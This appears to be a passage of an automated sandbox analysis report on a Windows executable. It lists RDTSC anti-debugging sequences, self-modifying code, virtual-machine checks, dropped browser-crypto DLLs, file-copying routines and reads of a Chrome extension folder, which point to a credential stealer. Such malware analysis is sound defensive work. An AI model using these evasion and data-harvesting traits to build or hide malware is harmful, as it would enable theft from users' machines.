Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A2D second address: A71A3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE9A87AE1E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A3B second address: A71A45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A45 second address: A71A69 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE9A87AE1F2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007FE9A87AE1E6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76409 second address: A76438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A9298666h 0x00000008 jmp 00007FE9A929865Ah 0x0000000d jg 00007FE9A9298656h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81792 second address: A8179D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82DC8 second address: A82DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A9298660h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89C71 second address: A89C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FE9A87AE1E6h 0x00000009 jmp 00007FE9A87AE1EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94F48 second address: A94F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Bh 0x00000009 jmp 00007FE9A9298665h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B919 second address: A9B91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B79D second address: A9B7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA232E second address: AA2334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2334 second address: AA2338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2338 second address: AA233C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA233C second address: AA2344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2344 second address: AA2354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2354 second address: AA239E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 jo 00007FE9A9298656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FE9A9298668h 0x00000018 jl 00007FE9A9298656h 0x0000001e jo 00007FE9A9298656h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pop eax 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA239E second address: AA23A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DC9 second address: AA7DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DCD second address: AA7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DD7 second address: AA7DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DDB second address: AA7DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79AE second address: AA79B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79B4 second address: AA79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4EB8 second address: AB4ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FE9A9298656h 0x0000000f ja 00007FE9A9298656h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4ED3 second address: AB4ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB8CDA second address: AB8CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FE9A9298669h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6AE0 second address: AC6AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6AFD second address: AC6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FE9A929865Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6B0A second address: AC6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F8h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE9A87AE1F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6B45 second address: AC6B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD763C second address: AD76AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9A87AE1F4h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FE9A87AE1F7h 0x0000001b jmp 00007FE9A87AE1EFh 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007FE9A87AE1EAh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE9A87AE1F6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76AC second address: AD76B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76B2 second address: AD76BC instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A87AE1F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76BC second address: AD76C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD643E second address: AD6443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6443 second address: AD644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6724 second address: AD6729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6729 second address: AD674B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jp 00007FE9A9298656h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FE9A929865Dh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD674B second address: AD6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A5D second address: AD6A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298668h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A7A second address: AD6A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A80 second address: AD6A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7023 second address: AD703F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD703F second address: AD7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD71E4 second address: AD71EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD732C second address: AD7332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7332 second address: AD736D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE9A87AE1FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A87AE1F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB606 second address: ADB60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBEE second address: ADBBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE9A87AE1E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBF8 second address: ADBC65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FE9A9298668h 0x0000000e push dword ptr [ebp+122D271Fh] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FE9A9298658h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov dx, ax 0x00000031 mov edx, dword ptr [ebp+122D311Bh] 0x00000037 push 06939334h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jc 00007FE9A9298656h 0x00000045 jmp 00007FE9A929865Ch 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD18E second address: ADD196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD196 second address: ADD19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD19A second address: ADD1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF1F3 second address: ADF1F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150274 second address: 5150278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150278 second address: 515027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515027C second address: 5150282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150282 second address: 51502DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298664h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edi 0x0000000e mov ebx, ecx 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FE9A9298661h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FE9A929865Eh 0x0000001e mov ebp, esp 0x00000020 jmp 00007FE9A9298660h 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502DD second address: 51502E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502E1 second address: 51502E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502E5 second address: 51502EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150332 second address: 51503FC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9A9298660h 0x00000008 adc cx, 7158h 0x0000000d jmp 00007FE9A929865Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007FE9A9298668h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FE9A9298666h 0x00000027 or ch, 00000018h 0x0000002a jmp 00007FE9A929865Bh 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FE9A9298664h 0x0000003a add al, 00000078h 0x0000003d jmp 00007FE9A929865Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FE9A9298668h 0x00000049 jmp 00007FE9A9298665h 0x0000004e popfd 0x0000004f popad 0x00000050 xchg eax, ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51503FC second address: 515040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515040F second address: 5150469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE9A929865Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE9A929865Dh 0x0000001a xor esi, 42DC7D36h 0x00000020 jmp 00007FE9A9298661h 0x00000025 popfd 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150469 second address: 5150477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150477 second address: 515047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C00 second address: 5150C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9A87AE1F7h 0x00000009 and al, 0000007Eh 0x0000000c jmp 00007FE9A87AE1F9h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FE9A87AE1F3h 0x0000001f or ax, 948Eh 0x00000024 jmp 00007FE9A87AE1F9h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C76 second address: 5150C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C7A second address: 5150C98 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 2A33h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9A87AE1F0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C98 second address: 5150C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C9C second address: 5150CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150CA2 second address: 5150CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A929865Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150CC4 second address: 5150CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9E9ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9FCDCB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 841C50 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005E16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E1160 GetSystemInfo,ExitProcess,

0_2_005E1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
